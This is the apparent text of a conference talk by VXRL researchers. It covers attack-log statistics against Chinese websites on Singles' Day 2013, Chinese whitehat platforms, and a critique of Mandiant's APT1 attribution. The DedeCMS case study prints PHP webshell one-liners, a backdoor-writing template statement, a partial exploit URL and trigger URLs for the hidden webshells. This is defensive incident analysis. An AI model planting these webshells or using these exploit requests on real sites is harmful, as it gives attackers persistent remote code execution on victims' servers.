China is a victim, too :) (AVTokyo Special Edition)Darkfloyd x Zetta, VXRL

感謝 ! AVTokyo!

Thank you so much to AVTokyo Panelist

Disclaimer

We are not working for China or Hong Kong government

We didn't get any fund or money from Hong Kong and China government

Objective

● China is always taken as a proactive attacker, we wanna show there is another flip side of analysis through:− Part 1: A single day of Web attack analysis against

various web sites in China.− Part 2: How do you know vulnerabilities published in

China software and web site? ● Media always talks about blackhats in China. How about

whitehats in China?

− Part 3: APT1 report counter-comment (From Ran2)

Part 1: A single day of Web attack analysis against various web sites in China.

Research and Analysis

● We have got a sharing of attack log/data captured by their cloud-based application firewall from Knownsec, Beijing with VXRL so as to carry out the analysis.

● We have picked 11 Nov, which is a day for online shopping/e-commerce (Single's Day,光棍節 ) with discount within Mainland China for this talk.

● We will not disclose any victims' IP address and domain name depending on the criticality or the nature/impact of attack.

Single's Day ?

Single's Day

Single’s Day as Cyber Monday

http://en.wikipedia.org/wiki/Singles_Day

Research and Analysis

● What do we wanna observe and analyze?− Percentage distribution: Attack from overseas Vs

Attack within country− What kind of attacks suffered for those top victims?− Any top attackers?! What are their favorite payloads

skills?− What system(s)/platform(s) do the attackers target?− Any interesting attack payload?

11 Nov: Attack Traffic Vs Period

11 Nov: Attack Traffic Vs Period:Evening and Night Time

Attack Type DistributionAttack Type

No. of Request

Percentage

SCANNER

59101248

91.3447%

LRFI 218753 0.3381%

FILEI 222774 0.3443%

SPECIAL

35838 0.0554%

WEBSHELL

42463 0.0656%

COLLECTOR

4491625 6.9421%

SQLI 274792 0.4247%

XSS 225796 0.3490%

OS_COMMAND

1022 0.0016%

CODE 86140 0.1331%

OTHERS

887 0.0014%

64701338

100.00%

Where are those attackers on e-Shopping Day (11 Nov 2013)?

According to our analysis, 97.5% is from “Within China IP Address”, the remaining 2.5% of attack is from overseas, but it includes scanner type.

How about excluding scanner type?

Country AttackChina 1070489US 18588Netherlands 5404Hong Kong 4288Korea 1823Turkey 1429Japan 872

Top 25 Attackers

Top 25 Attack IPAddresses areFrom China,EXCEPT 24th,it is from US.

Case Studies: Victim or not?!

Voting for a “Good Guy”

Tou.php – “Tou” means “Voting”, in Chinese is “投”

The requests against this site is with 6.5GB data.

In fact, we, Chinese are very positive to support and promote “Good act and Good guys”

Possibly, it is hard to differentiate the real voters and robotic one

When looking at the traffic, we have found attack traffic from Hong Kong

Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X

My favorite ISP :)

Hey, it is 11 Nov (Single's day) for Shopping!

We have found attacks against “Group Purchase Web site”, 47 attempts to access order info data of web site via old classical attack OS cmd

How about those overseas attackers?

Where are they?

Country IPChina 116.252.224.162US 173.208.240.190Korea 119.70.29.137Hong Kong 58.64.205.27Thailand 110.34.230.226Taiwan 118.233.66.105Japan 202.89.232.79

Observation: Any interesting attack payload from overseas?

From US ?! Using China Python Layer-7DDoS script?! :) (from 00:00 to 2359)

Observation: China Tools, IP address from US :)

http://www.dklkt.cn/article.asp?id=233

How about attack traffic from US?

How about attack traffic from US?

• Scanning and exploiting particular recently released vulnerabilities of CMS.

• We will discuss it more in details later.• Targeting forum and CMS.

How about attack traffic from JP?

How about attack traffic from JP?

Nothing special, only casual download, traffic necessarily from scanner.

Interestingly,webscan.360.cn uses JP IP address to scan hosts in China

How about attack traffic from KR?

Nothing special, only casual download, not necessarily from scanner.

315online.com.cn - An Anti-Online Fraud Portal

How about attack traffic from TW and TH?

Typical scanner traffic, nothing special.

How about attack traffic from Netherland?

Scan a Wordpress-similar site in China

Observation: Special Payloads against victims

● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B

● Create Webshell backdoor under Dedecms● Against Dedecms, I am kidding, there are lots of other

victims suffered from this kind of vulns:http://www.wooyun.org/searchbug.php?q=dedecms

Dedecms (China-made CMS)

DedeCMS

Reference: DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file.http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759

/plus/download.php exploit - Inject Webshellhttp://www.xiaosedi.com/post/dedecms_exp_01.html

/plus/search.php exploit - Inject Webshellhttp://eoo.hk/oswork/28.htm

DedeCMS backdoor killer from Anquan.orghttp://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_278959.shtml

As you have found 90sec.php from the log, and there is an .inc file with this statement:{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}However, there is no such file found from the folderWhy?Under data/cache folder, there are several htm (myad-1.htm,myad-16.htm,mytag-1208.htm) files are found with the following code:

<!–

document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);

–>

<!–

document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?

>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

–>

<!–

document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/

[copyright]/e’,$_REQUEST['guige'],’error’);?>”);

–>

It is strange that .htm page could be taken as a webshell, the idea is whether those htm files are included and gernated by another PHP fileAfter checking over, we have figured out: plus/mytag_js.php

Triggering the backdoor webshell with the following URLs by passing in various ID values WITHOUT detected by scanner:

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

Reference:http://www.nxadmin.com/penetration/1168.html

Part 2: Organizations with China Whitehats

Whitehats in ChinaWooyun: Bugs published in China

● The idea is the same as CVE-Mitre but more informative and organized

● Vendor neutral● Public and open● Promote Whitehats community (

http://www.wooyun.org/whitehats/)

Observation #1: CMS bugs everywhere (after Google

translate)

http://www.wooyun.org/bug.php?action=list&subtype=52

Observation #2: Even some Whitehats reported the

vulns …..● Whitehat reported a high-risk vuln. to 360, but

360 said: Ignored it !● My comment: WTF!

Consistently ignore high and medium level vuln. (highlighted in

Yellow color)

http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360

Observation #3: Positive reward from vendor and promotion of

whitehats

Zoomeye (www.zoomeye.org)

Whitehats in China: Anquan.org (A Safety Alliance among various software

and security product vendors)● With 800 vendors● Vendor neutral● A platform for public to report any infringement,

privacy violation, phishing attack, etc● http://www.anquan.org/help/aboutus/authen/

If time permits….Part 3: APT1 Report – Counter Comment from Ran2, VXRL

APT1 Report: Counter Comment

● Anyone has read Mandiant APT1 Report?● Analysis was done by Ran2, Researcher,

VXRL.● Mandiant deduced the attack against US from

China PLA Team #61389 with the following deduction:− Attacker profiling via his password− Posts in the forum

APT1 Report from Mandiant

● On 18 February 2013, Mandiant, released an unprecedented report – “APT1: Exposing One of China’s Cyber Espionage Units”. Mandiant claims that they have identified evidence linking an APT attack group, APT1 (aka Comment Crew) to the Military Cover Designator 61398 of the People’s Liberation Army (PLA).

APT1 Report from Mandiant

● Chinese officials have vigorously denied any link to what Mandiant’s accusations of these APT activities.

● Some commentaries said: “Clearly, Mandiant caught Beijing’s hands in the cookie jar”.

● However, some other responses from skeptics said that the evidence produced by Mandiant did not include any alternative conclusions other than pointed at China or the so-called PLA hacking lacks of convincing evidence.

Clarification #1: Attacker Profiling● “APT1 is not a ghost in a digital machine”,

Mandinat claims; they had identified a select number of APT1 personas. In page 51 of the APT1 Report, they provided hints on how they perform the persona profiling, basically by data mining of:− the authors of APT1’s digital weapons, (ie the

malware)− the registrants’ of APT1 FQDN, (aka FQDN

profiling)− the email accounts (in pubic social websites)− the registration records of leaked hackers’ account,

Rootkit.com

Clarification #1: Attacker Profiling

● Based on the profiling results, Mandiant believed that these three personas were based on Shanghai, responsible to authors the malware, preparing and launching the APT1 attacks and they are working for PLA.

● UglyGorilla (UG) is the key persona identified that leads to the above conclusion.

Clarification #1: Attacker Profiling

● Further search on the Internet, I also found Jack Wang’s postings in the China military forum. However, I discovered he, UglyGorilla or Jack Wang actually posted 15 messages, only 2 messages are related to cyber war, all others topics includes, normal warfare and even bio-chemical warfare. He even posted to the forum that he was a military warfare lover, but not mentioned he himself as a soldier. I think this piece of information should also be disclosed in the APT1 Report.

Clarification #1: Attacker Profiling

● Even though we have high chance to proof that UglyGorilla is Jack Wang or Wang Dong who is the author of the APT1 malware, I don’t find hard proof that he is a China soldier or servicing the PLA Unit 61398. The only link I can find is his posting in the Chinese military forum, but on the contrary he also said his was only a military lover.

Clarification #1: Attacker Profiling

Similar to UglyGorilla, the APT1 Report identified another persona, DOTA. Based on a video captured, I guess it was gathered from a RDP connection on the monitored hop that DOTA was once used to register email accounts.

Clarification #1: Attacker Profiling

● It is clearly proof that DOTA was using a Shanghai telephone and he is fluent in English when communicate with other parties. I believe DOTA using the password of “2j3c1k” may means (二局三处一科 )

● but we cannot rule out it bears other meanings, such as (二鸡三吃一刻 ) or the meaning of “the moment of cooking 2 chickens with three different ways”.

Clarification #1: Attacker Profiling

● Yes, it is interesting and there are lots of ways to interpret the simple characters in Chinese.

● I am not trying to find an exit for the accusation, but I would like to see more solid evidence pointing the fingers to the PLA Unit 61398 as APT1.

Clarification #2: Infrastructure, Remote Desktop Sessions

● On page 4, Mandiant mentioned that “there are 1,849 of the 1,905 sessions were observed using keyboard layout was “Chinese (Simplified) – US Keyboard” and they assumed that the attackers used Chinese version of Microsoft OS. Because the attackers are using Chinese version of Microsoft OS, Mandiant implies that APT1 are Mainland Chinese speakers.

Clarification #2: Infrastructure, Remote Desktop Sessions

● Based on the RDP Protocol document from Microsoft, I found out that the RDP client send out its keyboard layout in a 4-bytes specification to the RDP server (the victim or hop, in our case). If a network sniffer was installed on the RDP server, we can collect this piece of digital evidence. If the attackers used “Chinese (Simplified) – US Keyboard”, on the recipient side, we can locate a 4-bytes evidence of 0x0804 from the network packets.

More details from APT1 Counter Comment Report

− http://espionageware.blogspot.hk/

Summary● Interesting payloads and practice against China

sites are shown.● Web attack from overseas against China on 11

Nov (a day for high volume of e-commerce and online shopping) is not the majority.

● Majority of traffic is on crawler and scanner, other than that, the majority of attack is SQLi.

● There are lots of attacks against CMS systems in China.

● There are whitehat non-profit making organizations including Wooyun.org and Anquan.org to help the China security community.

Summary● Expect technical or/and journalist reports with

more reasonable deduction, sufficient proof and scientific analysis.

● We hope to see more balanced view and analysis reports not just labeling China is the only cyberwar actor in this party.

● We hope to see a more fair comment to talk about the positive side of security in China.

● Selling products and solutions are easy by giving a false sense of “threatening”,however, as a researcher, please keep your ethics high and mindset clear. We are researcher and scientist but opportunist.

感謝 Thank you so much :)Respect and appreciate to Zetta and Ran2 for

their work, analysis and time

Highly Appreciate the attack log shared by Knownsec for research purpose.

darkfloyd@vxrl.orgozetta@vxrl.orgran2@vxrl.org